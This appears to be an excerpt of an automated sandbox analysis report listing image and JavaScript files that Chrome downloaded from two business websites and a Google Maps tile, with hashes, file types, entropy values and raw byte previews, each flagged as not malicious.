                                              SHA-512:619CB2D61CE4D91B9F967ECC29E5CB540D8EDA89C7C6E4F4249F1C95940F41166275E3498EE6C064868D90BB20EABE15C985C9F47DDCC4F9261B9E6B2599F4C3
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................P.......................................................................................................!".Av.1#t..67w89q2u&..x...........................!.1..AQ".2#..a.B3t.78.r.s5u.6vqRbD......CS....9............?....i.4.cM1...Li.4..i.4.cM1...Li.4..i.4.cM1...Li.kp...fn.=l'..m=s.6,mE....Q..s.Z{t.....a.r$.".....J..q.......S.b...Y......<M...j..*f$.?E....=>.....1....RG.5.e..n./l.Wh.<.tP.(..T.v. .e...X....n$...@;b.t.Z;e@.?c..G.Pyw.k.)"..p.....L.d.pd...v...Iz..J..d..|V.3...Q..J.C2..OU~.....f.\...<.2YBh.P.{.W..D.5o..E...R.\w5?Mh...>p..PT.yGj...ZI.cc...o..ji...t..U....c.{..NW....v...].".......Lq...|....2...`;}.o..3..c-..K#...F.J....4.B...=h."[..$.<L.i..J..".1NtH..N..._..L.."....b...]Kj.3E#%}.I..t....\....VxR@.R..j.....,...4..i.4.cM1...Li.4..i.4.cMh....J.+.......V..r.a.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13585
                                              Entropy (8bit):7.630350603696567
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwBXBjA5rXdf9NhCVrHRcKhGaHXGiCWyZAsR2aFm0d/t3Mx8:4YNg7VBjGPhCZHhhHXTCNR2aVda6
                                              MD5:24847E030BEC9DD8DC0DED3FAE435939
                                              SHA1:2A252584FD6B4BA5F0062F95CF9366B446EDCC79
                                              SHA-256:F30769594F56B317CAB3758242A5AA92C36D4F70290083ED0D94E2E5276FEFE2
                                              SHA-512:07605946E50B27A8489A1097CEBC11C249151A5B17B6EABB2AA76676E362E5FECA11B29ECCA3069AA3430D59C5C03DE1C36D1B585AF2A5FE8A8565DB2C0258C0
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 68x68, components 3
                                              Category:dropped
                                              Size (bytes):2651
                                              Entropy (8bit):7.811950005998033
                                              Encrypted:false
                                              SSDEEP:48:+pcsu5e9wuWP8xX3M4xuQIc4G4nDzviQSGmw8i/CpqfRYK8tjveuvCKQMTlwGxn:+Gs9wG9MQIc4G4nDz6pw8iluReuvFTl/
                                              MD5:447FA3A5638525CD6DDD5CF263ADF48C
                                              SHA1:D807B90FD4994058E15845882A2842BBC1A05E05
                                              SHA-256:48AE8E4C2870B04947366E1D17AEE9BA104A76B20732B1E6E5F6A655C7E869B5
                                              SHA-512:2987B663AE9488EE0DF2913DE9833F92F7E889508FB354AC0955C9A8C636C4F641024B88967D229F9504DCD5785512A6DCABA45012B1B7A755DA21D3CFE6F28A
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF......................................................................................................................................................D.D............................................B..............................!.124ARTUt......."Qq..5r...#$&BDa...................................B...........................!1AQS....34RTars........bq....25.."B.............?.j.J.....ROP.u.C...5.+..nG.1{...]..F.YqLf..:..nG.1{...mfQ..)....R;-.../z.<-..4..1..T.Ge.....S..F...3O.H.#..|.(...i.S....~S..O...e.R..?.u-...(r..#f'@."3...@.O..DF......,....e...X..Toy].>.7...#.N..v.7..K...a.N.XO..G.~...1.`..DH.. ...[..o.z.#`.K...t......a`.-...(.5.A..X7 Kk.GJ:.o.z..........[.....r....t.[..h.u..(..[.....c..{@..P..+......p..C~c.e..\8....-..).....rw4.+.....X~ .=..........H.....b*R0D`....+S.....S.kc.....;.V..o.g:6..&.1.W.....j}.o.&$G..=..Do.~...%...%..$.......c.D.......!:1..@.E:..7DsX.&........JV~...4...:.H.p....C@.Y..++.o...W.]..y.D..s..B:.0.L..=BF.2i.......j..(..@*..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3127
                                              Entropy (8bit):7.9015255874939
                                              Encrypted:false
                                              SSDEEP:48:ZyUCcssghV16KLlHcamTuEJCptzu+hnbLy/+VoR3VP/S03SqaIQhha:cBsg/LlHcamux8iLyWSVP/T3SqaRha
                                              MD5:6E6850BE094DE848AED71D7FFABD67A8
                                              SHA1:46AA32D76D1A2E4DBDEDAF484CD78E00A7186944
                                              SHA-256:A1FEDF3947D0626018D684CBEC17C4556B0B1B511B745DFE0B54869A80FFE09F
                                              SHA-512:8075A03CBF196FFA2208361500D8C8B6B435DABBDF29021D676EC381760315895C21C64EC4DF60D26B947AB0670BA91109DF1F2583EAA3C3AA91E858C1210D52
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...............o...~....5.....2..l...}........|.k.....k...x.h...v./.........}.$...p.......w..<.................u......|.1..M......p.K...~......;...g....B..P..........Y.....).....c../..n...........=..Q.....8...d0Ax~rtp....r.}...tb..=.f...W.gK.sH.i0..D..b.lX....iA...........IDATh.Y.w.J.&<.. .......@EQ...S...r....?..@.A...f......;W.zE`.....&.,.#..;4|.:."...l.b.0".."............$..81..9.o.F..<AB1M..4.E.......$......A.$\VE..>.=..b.....^.D..{.y..%a.p.b.4I'..%..$H.....P$EP.A0H..t...I.|...9.S..H.7..A.(..8.+..H...,.$.".}...4..9R..!.fH8A?;>>>:.s.>H.....b.(:..y.....+..'hg.''.'.gRL...b........s1;l4fcR..rvr|.I...X......T=b.x.&....<I!I.......V.L"G.....<.H.V;..,....J..<d9B...<X...$H..$...I..M....<............q.I.Hdif..`..U.$]X.....3...fi.a9..r.[.|..'.vv....kH.Nk...Z.X....1..*..Ox._..:,&..daChH{.a.%.#..8v.a..xB]8.k.K.....x.4........3..9$...b....ew.DpoNo.....x.~}..d=1..4.nM......'.r.....$iI..<..F.O.E.h.l.mf......c..9*..k.v.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12708
                                              Entropy (8bit):7.596179989827188
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwcwxtSDlCf2scXBb27c2rQ2WSzT0K39fuY6bPMBjT7R/kCqBW:4YNg7DwJK2NXI7k2Ho0RBEW
                                              MD5:201B73BED71CD40FE3966F06FEB3DAEE
                                              SHA1:4BC7476C814550975AFFDBB260EF50C96104F398
                                              SHA-256:39166EF1235DA74E51ABEC5027C28CAEF16A3AC296F50CADA5E83A194789FA31
                                              SHA-512:D5367616D4DC52020F240B30C1AA84B67E388073E2A2DD77322DCA1F9906E32418ADF9CDBAC8B61834F224F86D9CFB4598F571FAEF1219405D3CA7191241A55C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):45240
                                              Entropy (8bit):7.9954877793078545
                                              Encrypted:true
                                              SSDEEP:768:wmRGkmmRc+ekyWhZwgHZd7ceI0ikJL0om53zmWSeG1VtrSjz3U8gtkD5ecGUeb:NGlmLHlmgHDNIzGLzm5SWSeOtWjzVpDI
                                              MD5:F1A8DAB20468A00D9E77DD689CFBCCA7
                                              SHA1:957C3335CAE08CEAD77AAE0B34E376110BD1C1F3
                                              SHA-256:D0399F5B6DB766314144D936560D74E0920F482AB01F16A298392E9A13E61F5B
                                              SHA-512:2D874B8D369EDF0F9536C292BEC2A6A368D615FADE26E08B1A483C8B9FB630E72DF3BD9CDFAC4DF85B2E006E9255992D03760A8C7CF05BC944285EB44206AE0C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/15/6a0a747aec6891a7650e250b247f7939.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 <........*....>.n.S)&3.$rJZp..iA..g..\...C_.x..c..=........?...1d6O.Q.8hy.......,w.y.../.y._..w._......7b/.Y7._....$.G.^.......$..j...........?.......~....-.=..ao...=d.....7..^RR..-`....%.......u..K. #W..@D...%........"...@.Z..0x3.@D....{...*<P.K..s.k...~.bL{{..<...?;.H.j.D.`.T..B......(....4H.....^..$@X...3..H..~E\..^3.O.@g./..(wf...f..C..?a.._.P..9..D.......f..w..C..Kv .....hT... ..NT.5.J..x.L...r.[.&$Z...9R...E.]A.....78.#D.#...n....e...8..#6|n$T....`F.7.........._j..(.1.x.....ui..s.T..R.F.&$T...;.7.8.?Y.]....Q|7......R%...]|..K..`..."9.y.y...8Y....8.|....o....\h...8a...o....K.L ..........r...H.....H.w..Mk....#...........oZ....%VHg\....J#o.0.vrG.b..".......X....a...u..}.... .q#...d4..:.PN..Pd..A%...i.].......}<P4.P@.*7..,./B......2...."m.IW......,.y.......0.zq ....c..r?.........d.\t*c..?.4.1"..=......&....T~.4.fEE...t.U.*.o..}q.1. ...u..h...0.P ...8H.2cC'..g.?],.u.Q4r..i..c..7.*...@HKYE...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2500x1335, components 3
                                              Category:dropped
                                              Size (bytes):165418
                                              Entropy (8bit):7.53929226063658
                                              Encrypted:false
                                              SSDEEP:3072:gRrBfkt0HljttBPDjLxCrHMZvUZ6gUtw9WcER8vMjG2ccjb0oPvAs7rJUi:gRrBf7BPIev29uOv9voPDyi
                                              MD5:5FCED74A534806E15B01ECA8A25956C4
                                              SHA1:6F01AD35C78D6E03762972618DD1F58E6EA7833B
                                              SHA-256:3496EA6CD76F690D201AA55EAE93AE7983C0B280257C271409B5AB30B538BA08
                                              SHA-512:3D7FD8B64213800F4D638761DD2C0226A20F790FCC17F9D19DAFA8E2F26540C71C7BF89D27FB67F32F14DBF2F19CA4B3321E7989FEDBE9826488007EA45AA8F4
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.............)http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:674A96AFB83611EB8BCFABEC85605DC7" xmpMM:InstanceID="xmp.iid:674A96AEB83611EB8BCFABEC85605DC7" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:84CBB63DA50211E79A8ADFD67E9C93F7" stRef:documentID="xmp.did:84CBB63EA50211E79A8ADFD67E9C93F7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6784
                                              Entropy (8bit):7.94345694428201
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4waa0nzg8gafihHHbES2+xJXR0N:K0wenvfi5HbEj+JB0N
                                              MD5:F5D9208DEAACA5664119107FF6323F1B
                                              SHA1:CB6BD987E04319EAD3F8132DDDDCB7CB4CCC65B0
                                              SHA-256:CE6A8EDCFC3DDFDFBABCA544A51469AD80088B595D6F8F7EBB60A693BB16CBC6
                                              SHA-512:1C34AD05F829ED5AA574B657B48DAF7E0B1E2FD0DB8D024A0168DD62EFA0DF795EA0FC7A3FA4B1A123CEB24096C4EFB1CE8739F3AFFE30379EA8519DDF08AB15
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/16.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):15166
                                              Entropy (8bit):7.983733019454587
                                              Encrypted:false
                                              SSDEEP:384:pG7oSTin70qbIABXQ/ut2Xfxb66G/y7FG9j2V6bIe3:pOoSTk0qfOutWb66G/vjP0e3
                                              MD5:6002350AEA931E5A5F45840369E2447F
                                              SHA1:FC0A6D76D23DDABE74BC9045B79BC02BA0E969B8
                                              SHA-256:87D3BE651CE813793799CB927016AD957A0AAF1665ED1C331ED2A8AAD4DA5BA7
                                              SHA-512:DBAC5F9E154146B091A87A011793A9245F1820130BD6F9A1CA4A88EA2585F9CF539803260750CB5800CB6962285A3CFBB69FCE8DEE04DA3C52FB000079B51652
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21411!3i14013!4i256!2m3!1e0!2sm!3i707457569!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=36655
                                              Preview:RIFF6;..WEBPVP8L);../..?...mU9...$...hE.J...e...k.6.{nl.7]......m.WO.m......COI...3.........$".H.4..pC....@F.@.x@.L..dD\VpV..._v.A..B...@.H@d.......U.]N.$G..+....x...?#?,..e...y.r.C..-.*....i........s.\.ul..W..B..u.X......b...&_i.4.U...t.......b....~..^[Jd...IvP.M..:.h...v...+:.P..x.<.o.._.... %{M..W.+....n..eg.;..*.|...i.k.I ....X..b...^c.fz.g..8...d..v...,M....tt.;.>....K.$.n..aI....yw.........u}../..E.._a....>{R..}.G..O..lM......> ...l.._ra..VJ..._.....HU..-...N.O.{.7_.b.._..9..(.|A....oX_njoU../W............_.9..|./_^.9f!.pm.y.o.X.'W..."^<)..[..`.6[..p.,.....aP+q.-.w.P.......*5.4..{.?.......?.v.4.ln.I.V........W.x.<#....}..e.O....@......K...(.............7..R..F.zOfV.%./...e.f{A./..?..x.........[e....w._]...W....su...G....b....."+.g...'L+5.0.C.-......o.....MF.nxxJ........>.j......_..(....ah..3......}.G.>...S....KLSh.s.0....f...z.......L.I...X..U.r.7n...N ..O..y..p^r[l.J.S.)...t^z....y..C+E.2|:.!..sp..D.}~...R.~.,..<P..^.3....\.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (886)
                                              Category:downloaded
                                              Size (bytes):71581
                                              Entropy (8bit):4.024123069408272
                                              Encrypted:false
                                              SSDEEP:768:Ku/GVO1bf9UuHyA4T3E3o9upOCRDLeIMdnmqB4UoLMJzXmdE3uYKk2N1f:Kv+T74TTkDT8jQMak27
                                              MD5:A8A8E7613AF1615A08DE56A794A478C5
                                              SHA1:93A903BDE48038384F1076332B2CDCD61EF6D351
                                              SHA-256:18734CDE412853B2861D9294A0501C3DB6EF4D903DB12287A8A1D7A62E998248
                                              SHA-512:7A5C4529604523DEADF772333164B4B2751588A199F4723B68324B13C0DF9D93D6A9302FE0B30F678019DF2F967ADA67D170D894ED213F086C2237225AA72C61
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/ScrollTrigger.min.js
                                              Preview:/*!. * ScrollTrigger 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * Subject to the terms at https://greensock.com/standard-license or for Club GreenSock members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e, t) {. "object" == typeof exports && "undefined" != typeof module ? t(exports) : "function" == typeof define && define.amd ? define(["exports"], t) : t((e = e || self).window = e.window || {}).}(this, function(e) {. "use strict";. function _defineProperties(e, t) {. for (var r = 0; r < t.length; r++) {. var n = t[r];. n.enumerable = n.enumerable || !1,. n.configurable = !0,. "value"in n && (n.writable = !0),. Object.defineProperty(e, n.key, n). }. }. function q() {. return we || "undefined" != typeof window && (we = window.gsap) && we.registerPlugin && we. }. function y(e, t) {.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):147556
                                              Entropy (8bit):7.998582910036463
                                              Encrypted:true
                                              SSDEEP:3072:XEV+SqxgawOmrInZPfyaZw8nNYT3mVMPD9GWbcgcqPjM2s2V4R2SO:XE9q2Hr6Pa+wyYLnD9GWbretR2x
                                              MD5:98566593DB770FD8CD8DF201541E7418
                                              SHA1:4D459B0D275C797D961ECE0A2A35ED1939516C7E
                                              SHA-256:2C68614A49CEED6A3A206E29D35640701DDA655F749A9B056A5B29AE47216E41
                                              SHA-512:A3ADAFAFB7ED5DA02BF72448F899853464F09F1DDCD3F17393A173A8666269D268E7D96AD700EA6896E095F089CA13C17C136D4C1509F37990CF1FEDDE48F590
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF\@..WEBPVP8X..............VP8 .?.......*....>.d.N.%........M.[..xh..f..h.....?y.]...{.....-.U..nQ\}...z[.y..0.....=..v.h|l...>o....?.........3................>.~...^.^...%}.?..b.....O.K...?{..........b~.....C....?...../.O..X.O...#..t...s.G.ob.e.......w.?e.|............i.O..........c.g.{...o.?...|......q.'..............VrK.....E...T.....6.;.C..|t.....D.v..i...,.g..zj...e..Jd,.9.j..............F(.y.....p.w|.........n.".s.5.Z......os..xc..z^........3.....W...{O"..q..0p.@.\Mu.<.y._M.K.+\F.o......O....c.....,...../@...x....... M.>..{.c..)..o.h.\..{.T...A5.c.j.....m.........Ob..j....Y......q.I...?.4?Zk...\nE...0.=sn7....o...Q..>1..~...X..'.D......i..t.y........^#.Mq14d.F....|..&...BD...7U+............(:.O.lIc.+j..._.@i.DWl.X.....V.a........b#.....K...(L..\ ..I,&...0..v._a.*S.^..x.....;..6`...&.[4mu...u..r....3d...>....[..D~..$..H.....U..;.b..H?..KZ.O..Q[..2........$.`.H)...a..-A&.K....^..........s.......2..#....$.n...j......O..XI...^T.O..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 4-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2694
                                              Entropy (8bit):7.920469198928458
                                              Encrypted:false
                                              SSDEEP:48:c09fi86/M2tSEz1+gNq3uzLkBXbeI5DaqReE/KqHbcVT8bZFBtmXaf:nfi8lLEznq3TBXbVkqkEyEjFBtmXaf
                                              MD5:F8E3136CB0964688A216AAE5042A8A53
                                              SHA1:29156BA2C5BE8474152D98A19972596B269C0986
                                              SHA-256:9E8C28B8716BE409499FAFE32EC8C342145C42CD42F3EC28896078C415D6C511
                                              SHA-512:0F869E85373A1757D4B41260DF88B0D007E49413160919C488DF7ACA480AC3F3FD3E53A777C3CF3BCD3F95BE2CD779A3ABE06C67B1DD46AADEB1AEC5A22EA32D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.......g...0PLTE222...555,,,...:::$$$......KKK...___...ppp..............IDATX.tX.......a..G...\..x.Y.%.0.,\....V..a.........y.,\cj..5.[..hlM.M0j.&..4.$W..M....4.VJ..5.\0.....{;..w.p73......."... R..;.}.@..|t...P.d...=...H..=..Z.a.e5...%7.N.....{..a.q.p-.?|Q..A.b4K...m.29G.B.[LC.G.....g4;@.<..Sf....=i4.)F.-.[..Z..x..r..K.{...)I...]..3...B........I.l.[...R...F..uQ.}...HO.....<..q.2G].s_l.....X.-q.^<..b...W.. a.P...8.).f~.f.........b..y..ZKI...{s......t..KA|.Yl.j....#.-.a..C4...Cs>FK..0G"X...:.w.....q.l....dn...........'z.kvhb.k..X...,.cm.....O5....@..Nd.k..s.`f...T..S.`......~7-......5...u..".*.^..+(.^..7K....TJ`..l31.ly..:...s_..=.....?qz)..@.<.4C.N. .g..G.Hc..<I.WQ.z.....A.Ru.8..sI%v..M.v--..u..n\....g...T.+HL..*FAW9.De.X.......p..o...$...^.......TI..V....;]K..!=..'...g.b...|%..$.I2....>...,w.D.Gv.....O.J....9.N.'.G....+..IN.4a.v.P....7...!M........Y...y.Z.......^.+m.%.?.g..O.2.........{m-mR._8#Q.....<<....W'..}M.?.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                              Category:dropped
                                              Size (bytes):47505
                                              Entropy (8bit):7.976417758817314
                                              Encrypted:false
                                              SSDEEP:768:aln4bvD2uAUzz/oDAK0V+GJMWMJT+cxFwc3wA9FBYw90uBXozqCd/vt47a+ZA29m:aVkvD2u9/oAJMWc+c2c3FCwiuBYf1vUO
                                              MD5:1CD9E5CE609D09DF75282F2F1B60B131
                                              SHA1:CCD79C99A982F2BBE33F708333E15759E58E3077
                                              SHA-256:43011B21219DD5A46A340DD9189083D2B483C5C44D007847259B94ECFA355682
                                              SHA-512:FB3CD6CBC1DEABB9089BE0CB4DB5E00CBA30CEAAD32B008450F4BC07C98CA57F967A54E56352CA6C58314B271EB08CD4274860C419606B2DAA6950E4C3C8024D
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<g..m.Z..M5.b=3B..m5<Ioi%.....Zi.\...+F.+).]x..s..G.T.Zxv..RP.]...Eqj.B...U...!..V...mx[N.lu.C[o......H.E.3..[/..H.*....{........i.&..l5.3V....R9.D..h.U^{....$.Ad.br......$.......Q.......n.u.z.Z%...x....+.k.p..|../.......n.........m..iQ.:..L.."]...WV.Lq.X....A.[..K(<E5.jzm..k..?;.;TS,r,K+.V.Lj.1.I2...<F........^.w2\..W3.LS.[@R........%..!...9...D`....s..4
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):70462
                                              Entropy (8bit):7.996896661598661
                                              Encrypted:true
                                              SSDEEP:1536:BiRQVuy0uBpZkmb5RFGFkzqzQ3169hX0cprb1TTFUFi1vhHc/N:BajO+5k3gzEchb8FiHSN
                                              MD5:231DC1227756A2787C291DE830A9327E
                                              SHA1:9F986B9E280BCCCA36E0D36DEB7EF5B7D7F7323A
                                              SHA-256:0D7E5EB7147DB217C4448E9D57403BC27C953FAAB3FB677516870975CF4D9904
                                              SHA-512:3F237D3F5B4BFBDE353B65EFC39323E9E980936B9249CB3ACFBE7992D23BD79D1A7CD1F28E2DD27096604D4DDA4E951B78B86C8E03B8380A9FC5FF887B2FD632
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/14/8b17fc00a52e697a42c3c2c98aaff156.webp
                                              Preview:RIFF6...WEBPVP8X..............VP8 .........*....>.n.R)&)....9...cK.r....jb.[x.q.k.{....).|'.......m............_........i>........A...{..W.....<...yC.O.............?.^..................~...).G...z..._.........._.J..V.w.).o...>..j...7.s.......L.......Y.H...E..F.j...U=..(,...Xs......+xs.I..V....3..e.1KI....pOb93.(...j......4S.....(..s....J...@.>..U.n...%.Vn.rk.S....."*w.].....X.......8..P..^=.b: ....".d.p7b.06.S.\,K...fZ...,.....$^1..x.H....'.....mWK-..q~.........e.?v...kx#..P.n:m&.b......=.e.S.?......H...&..7....V.n.."...~..,......|.^./.d.S?....L.../.IA..(X.c...f.Z}H....5.#..m.l........P...mF?....|....@7.@......[U.........{9.-...W..y.W.L....G.~. 2....EN..S..H..Z.s......[;...P..$.}3.vVg7..{L....@%.-...,..2C.w.g.J`..tA.!.#J./......h@tM5oTe..ihy...?h.K].K.......?."..r06......G.PK..W~.'...W....7..l...B..A?...ox. a..L;...[.b......k+......F....kM...fE.<..Qp,(.Rs..&.p2].6...z.F.........y.?\.%?.x&Q.......~..'.~V.`$.......-..a.. z..&6w...,|>.#y.f...g8.C...Ng.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 2546 x 672, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):56596
                                              Entropy (8bit):7.778590597603965
                                              Encrypted:false
                                              SSDEEP:1536:eMel8LY6lPNep/3WXkp2bdC8R7klC4nCNZIwRK:eB2pNemX10lC4GIwRK
                                              MD5:9A3673D3FBBFFEB5B80237CEBBCD77A7
                                              SHA1:408D4A7F6BEFE67267D9B4B64DB1990B75B1C7C6
                                              SHA-256:678F4D0FB7A8F638D31032F18719AC8FAEAFF49DFB55967996739120724042B7
                                              SHA-512:9F2F9B0234D4151880BEEAEE7CED261261E4C48DE49245ABEA1E89080CAC6BB7F22F37A170007E01831A131186D60FE84139B8A457AE706D2E3FB1E61D62DD56
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logow.png
                                              Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...BiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.2 (20231101.m.2385 38bb2d3) (Windows)" xmpMM:InstanceID="xmp.iid:6744F40C805F11EE8CF1DAAAB856DA4F" xmpMM:DocumentID="xmp.did:6744F40D805F11EE8CF1DAAAB856DA4F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6744F40A805F11EE8CF1DAAAB856DA4F" stRef:documentID="xmp.did:6744F40B805F11EE8CF1DAAAB856DA4F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>$S.....hIDATx......U.?.;.!H..$.....#..A..YX.s....f.5.k......."("&...YwY.k......2....S
